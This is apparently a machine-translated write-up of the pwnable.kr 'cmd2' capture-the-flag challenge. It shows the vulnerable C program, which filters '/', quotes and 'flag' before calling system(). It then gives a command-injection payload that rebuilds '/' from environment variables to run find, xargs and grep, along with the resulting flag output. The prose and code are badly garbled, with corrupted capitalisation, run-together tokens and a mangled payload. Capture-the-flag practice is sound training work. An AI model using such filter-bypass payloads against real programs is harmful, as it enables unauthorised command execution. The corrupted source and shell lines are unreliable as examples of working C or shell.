Tried all night and finally tried out .... True twists and turns, investigating Linux scripts.
Here are the points to note:
1. The SH bash inside Linux is not the same, and the presence on different systems is different. SH is designed for UNIX, stress reduction, inside than dash less features, resulting in debugging scripts many wrong do not know how to change, step by step to try out;
2. The key is to construct "/" this thing
3. To this Toodler ' s bottle has been finished, my tutorial also wrote Lesson 3, the next topic writeup very few, I do it more difficult, may turn protostar training it? The front is slow and the back is accelerating ~
[Email protected]:~$ ls
CMD2 cmd2.c flag[email protected]:~$ cat cmd2.c #include <stdio.h> #include <string.h>int filter (char* cmd) {int r=0;R + = strstr (cmd, "/")!=0;R + = strstr (cmd, "'")!=0;R + = strstr (cmd, "flag")!=0;return r;} extern char** environ;void delete_env () {char** p;for (P=environ; *p; p++)memset (*p, 0, strlen (*p));} int main (int argc, char* argv[], char** envp) {Delete_env ();Putenv ("Path=/no_command_execution_until_you_become_a_hacker");if (filter (argv[1])) return 0;printf ("%s\n", argv[1]);System (argv[1]);return 0;} < "bin" ${str2} "find"; STR4=${STR2} "usr" ${str2} "Bin" ${str2} "Xargs" ${str2} "Bin" ${str2} "grep a"; $STR 3| $STR 4 ' str=$ (export); Str1=${str#*home}; STR2=${STR1%CMD2*}; STR3=${STR2} "usr" ${str2} "Bin" ${str2} "find"; STR4=${STR2} "usr" ${str2} "Bin" ${str2} "Xargs" ${str2} "Bin" ${str2} "grep a"; $STR 3| $STR 4/usr/bin/find: './.bash_ History ': Permission denied/bin/grep:./.bash_history:permission denied./flag:fun_w1th_5h3ll_v4riabl3s_haha./ Cmd2.c:int filter (char* cmd) {./CMD2.C:R + = strstr (cmd, "flag")!=0;. /cmd2.c:extern char** environ;. /CMD2.C:char** p;. /cmd2.c:int Main (int argc, char* argv[], char** envp) {./CMD2.C:Putenv ("Path=/no_command_execution_until_you_become_a_hacker");. /CMD2.C:if (filter (argv[1])) return 0;. /CMD2.C:printf ("%s\n", argv[1]);. /CMD2.C:System (argv[1]); Binary file./CMD2 matches
"LINUX" pwnable.kr cmd2 writeup